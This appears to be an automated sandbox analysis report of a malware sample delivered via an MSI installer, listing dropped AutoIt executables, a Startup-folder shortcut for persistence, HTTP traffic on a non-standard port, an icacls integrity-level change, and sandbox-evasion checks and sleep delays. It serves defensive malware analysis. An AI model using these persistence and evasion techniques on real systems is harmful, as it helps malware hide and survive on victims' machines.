Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0045A410 push 0045A4B6h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A4AC push 0043A4D8h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004504BC push 00450509h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00458510 push 0045855Ch; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0045E5CC push 0045E5F8h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0045E594 push 0045E5C0h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0041C640 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00440680 push 004406ACh; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00406764 push 004067B5h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00418708 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004588A4 push 004588D0h; ret
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0043A8A4 push 0043A8D0h; ret

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\ProgramData\fkeabad\Autoit3.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	File created: C:\temp\AutoIt3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\ProgramData\fkeabad\Autoit3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDAD.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3433.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	File created: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy)	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIDAD.tmp			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3433.tmp			Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 7891
Source: unknown	Network traffic detected: HTTP traffic on port 7891 -> 49770

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\fkeabad\Autoit3.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: SUPERANTISPYWARE.EXE

Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -42141s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -119333s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -38013s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -47979s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -58022s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -33161s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -44923s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -40647s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1264	Thread sleep time: -117784s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 6680	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7020	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 8012	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7500	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 5796	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7672	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7944	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 6716	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 2788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe TID: 7980	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8088	Thread sleep count: 144 > 30
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8076	Thread sleep count: 521 > 30
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -53266s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -100936s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -47690s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -98379s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -74299s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -98773s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -35309s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -34527s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -78150s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -70488s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -66239s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -73944s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -68690s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -34428s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -87931s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -90734s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -98794s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -90071s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -92014s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -70098s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -118782s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -68075s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -98860s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -101240s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -52037s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -32379s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -76502s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 8072	Thread sleep time: -118775s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 1460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7892	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7964	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 1264	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7852	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7924	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 2144	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7340	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 6080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 2452	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 5472	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7968	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 7524	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe TID: 5484	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe TID: 3612	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 4120	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 3192	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7412	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7688	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7236	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7096	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe TID: 7120	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe

Dropped PE file which has not been started: C:\Windows\Installer\MSI3433.tmp

Jump to dropped file

Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Window / User API: threadDelayed 521
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Window / User API: foregroundWindowGot 827
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Window / User API: foregroundWindowGot 832

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_004517BC GetSystemInfo,

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_004089B0 FindFirstFileA,
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00408AB8 FindFirstFileA,

Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 42141
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 119333
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 38013
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 47979
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 58022
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 33161
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 44923
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 40647
Source: C:\Windows\SysWOW64\cmd.exe	Thread delayed: delay time: 117784
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 53266
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 100936
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 47690
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 98379
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 74299
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 98773
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 35309
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 34527
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 78150
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 70488
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 66239
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 73944
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 68690
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 34428
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 87931
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 90734
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 98794
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 90071
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Thread delayed: delay time: 92014
